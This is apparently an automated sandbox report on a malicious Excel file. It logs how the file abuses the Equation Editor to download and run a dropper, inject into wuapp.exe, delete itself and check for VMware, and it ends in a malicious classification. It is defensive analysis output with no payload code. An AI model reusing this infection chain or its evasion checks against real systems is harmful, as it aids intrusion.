          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008A57C3
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EAE0C6
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F2D06D
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB3040
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC905A
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EDD005
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EAF3CF
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ED63DB
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F563BF
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EFA37B
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB7353
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB2305
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EAE2E9
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F51238
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F305E3
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ECC5F0
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EF6540
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB351F
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC1489
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE5485
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EED47D
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3443E
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE57C3
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBC7BC
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3579A
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBE6C1
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB4680
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F52622
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EFA634
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC69FE
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB29B2
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5098E
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F35955
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3394B
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F4F8EE
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F2F8C4
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ED286D
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBC85C
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3DBDA
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5CBA4
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ED7B00
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F63A83
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F4FDDD
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBCD5B
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE0D3B
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F22FDC
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F4CFB1
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EDDF7C
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC0F3F
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ECEE4C
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE2E2F
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E1BE
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E1EB
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00119220
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E79A
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E9FF
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0011DBC0
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00112D90
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00112D89
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012DEF7
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00112FB0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 008DF970 appears 41 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 008B373B appears 112 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 008B3F92 appears 59 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 013B4599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 0086DF5C appears 59 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 013B2400 appears 54 times
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EADF5C appears 121 times
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01F1F970 appears 84 times
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EF373B appears 245 times
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EF3F92 appears 132 times
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EAE2A8 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A2D0 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A380 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A400 NtClose
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A4B0 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A2CA NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A28A NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A4AA NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008600C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00860078 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008607AC NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085F9F0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085F900 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FD8C NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FFB4 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008610D0 NtOpenProcessToken
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00860060 NtQuerySection
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008601D4 NtSetValueKey
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086010C NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00861148 NtOpenThread
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA00C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA07AC NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F9F0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F900 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FBB8 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FB68 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FB50 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FAE8 NtQueryInformationProcess,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FAB8 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FDC0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FD8C NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC60 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FFB4 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA01D4 NtSetValueKey
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA1148 NtOpenThread
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA010C NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA10D0 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0060 NtQuerySection
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0078 NtResumeThread
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0048 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F938 NtWriteFile
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA1930 NtSetContextThread
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F8CC NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FBE8 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FA50 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FA20 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA1D80 NtSuspendThread
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FD5C NtEnumerateKey
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC90 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC48 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0C40 NtGetContextThread
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC30 NtOpenProcess
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FFFC NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FF34 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FEA0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FE24 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A2D0 NtCreateFile
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A380 NtReadFile
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A400 NtClose
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A4B0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A28A NtCreateFile
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A2CA NtCreateFile
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A4AA NtAllocateVirtualMemory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exe | Memory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exe | Memory allocated: 77740000 page execute and read and write
          Source: DL03327INV.xlsx | Virustotal: Detection: 38%
          Source: DL03327INV.xlsx | ReversingLabs: Detection: 26%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
          Source: C:\Windows\SysWOW64\wuapp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
          Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$DL03327INV.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR6B01.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@11/16@5/5
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004021AA CoCreateInstance,4_2_004021AA
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404ABB
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
          Source: Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B2445 push ecx; ret 5_2_013B2458
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_0041E9FF push dword ptr [2E33947Ah]; ret 6_2_0041E9FB
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_0041D5D5 push eax; ret 6_2_0041D628
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_0041D622 push eax; ret 6_2_0041D628
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_0041D62B push eax; ret 6_2_0041D692
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_0041D68C push eax; ret 6_2_0041D692
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_0041E79A push dword ptr [2E33947Ah]; ret 6_2_0041E9FB
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_013B2445 push ecx; ret 6_2_013B2458
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01EADFA1 push ecx; ret 8_2_01EADFB4
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0012F1B1 push esi; retf 8_2_0012F1B2
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0012D5D5 push eax; ret 8_2_0012D628
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0012D622 push eax; ret 8_2_0012D628
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0012D62B push eax; ret 8_2_0012D692
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0012D68C push eax; ret 8_2_0012D692
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0012E79A push dword ptr [2E33947Ah]; ret 8_2_0012E9FB
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0012E9FF push dword ptr [2E33947Ah]; ret 8_2_0012E9FB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\yldnat.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D04FF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Boot Survival

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_013B1890
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wuapp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_5-6528
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | RDTSC instruction interceptor: First address: 0000000000408BB4 second address: 0000000000408BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | RDTSC instruction interceptor: First address: 0000000000408F3E second address: 0000000000408F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exe | RDTSC instruction interceptor: First address: 0000000000118BB4 second address: 0000000000118BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exe | RDTSC instruction interceptor: First address: 0000000000118F3E second address: 0000000000118F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1500 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wuapp.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_5-6980
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_00408E70 rdtsc 6_2_00408E70
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040290B FindFirstFileW,4_2_0040290B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-2887
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-2346
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-2390
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-2343
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-2368
          Source: C:\Users\Public\vbc.exe | API call chain: ExitProcess graph end node graph_4-3510
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | API call chain: ExitProcess graph end node graph_5-6982
          Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: EQNEDT32.EXE, 00000002.00000002.971587463.000000000069F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
          Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
